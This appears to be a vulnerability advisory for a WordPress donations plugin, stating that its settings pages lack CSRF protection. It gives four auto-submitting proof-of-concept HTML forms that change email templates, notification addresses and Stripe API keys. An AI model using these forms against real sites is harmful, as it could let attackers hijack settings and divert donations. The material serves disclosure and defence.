The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="seamless_donations_tab_templates">
<input type="text" name="seamless_donations_template_email_test" value="[email protected]">
<input type="text" name="dgx_donate_button_settings_templates_test_email" value="Send Test Email">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="seamless_donations_tab_templates">
<input type="text" name="seamless_donations_template_email_test" value="">
<input type="text" name="dgx_donate_email_name" value="testuserhacked">
<input type="text" name="dgx_donate_email_reply" value="[email protected]">
<input type="text" name="dgx_donate_email_subj" value="Thank you for your donation">
<input type="text" name="dgx_donate_email_body" value="hacked">
<textarea type="text" name="dgx_donate_email_recur">
Some link: https://google.com
</textarea>
<input type="text" name="dgx_donate_email_desig" value="Your donation has been designated to the [fund] fund.">
<input type="text" name="dgx_donate_email_anon"
value="You have requested that your donation be kept anonymous. Your name will not be revealed to the public.">
<input type="text" name="dgx_donate_email_list"
value="Thank you for joining our mailing list. We will send you updates from time-to-time. If at any time you would like to stop receiving emails, please send us an email to be removed from the mailing list.">
<input type="text" name="dgx_donate_email_empl"
value="You have specified that your employer matches some or all of your donation.">
<input type="text" name="dgx_donate_email_trib"
value="You have asked to make this donation in honor of or memory of someone else. Thank you! We will notify the honoree within the next 5-10 business days.">
<input type="text" name="dgx_donate_email_close" value="Thanks again for your support!">
<input type="text" name="dgx_donate_email_sig" value="Director of Donor Relations">
<input type="text" name="dgx_donate_button_template_settings" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="seamless_donations_tab_settings">
<input type="text" name="dgx_donate_organization_name" value="uuuu">
<input type="text" name="dgx_donate_notify_emails" value="[email protected]">
<input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
<input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
<input type="text" name="dgx_donate_button_settings_basics" value="Save Basic Settings">
<input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
<input type="text" name="dgx_donate_live_stripe_api_key" value="">
<input type="text" name="dgx_donate_live_stripe_secret_key" value="">
<input type="text" name="dgx_donate_test_stripe_api_key" value="">
<input type="text" name="dgx_donate_test_stripe_secret_key" value="">
<input type="text" name="dgx_donate_stripe_billing_address" value="auto">
<input type="text" name="dgx_donate_debug_mode" value="OFF">
<input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="seamless_donations_tab_settings">
<input type="text" name="dgx_donate_organization_name" value="uuuu">
<input type="text" name="dgx_donate_notify_emails" value="[email protected]">
<input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
<input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
<input type="text" name="dgx_donate_button_stripe_settings" value="Update Stripe API Key">
<input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
<input type="text" name="dgx_donate_live_stripe_api_key" value="pk_live_www">
<input type="text" name="dgx_donate_live_stripe_secret_key" value="sk_live_www">
<input type="text" name="dgx_donate_test_stripe_api_key" value="pk_test_www">
<input type="text" name="dgx_donate_test_stripe_secret_key" value="sk_test_www">
<input type="text" name="dgx_donate_stripe_billing_address" value="auto">
<input type="text" name="dgx_donate_debug_mode" value="OFF">
<input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
document.getElementById("test").submit();
</script>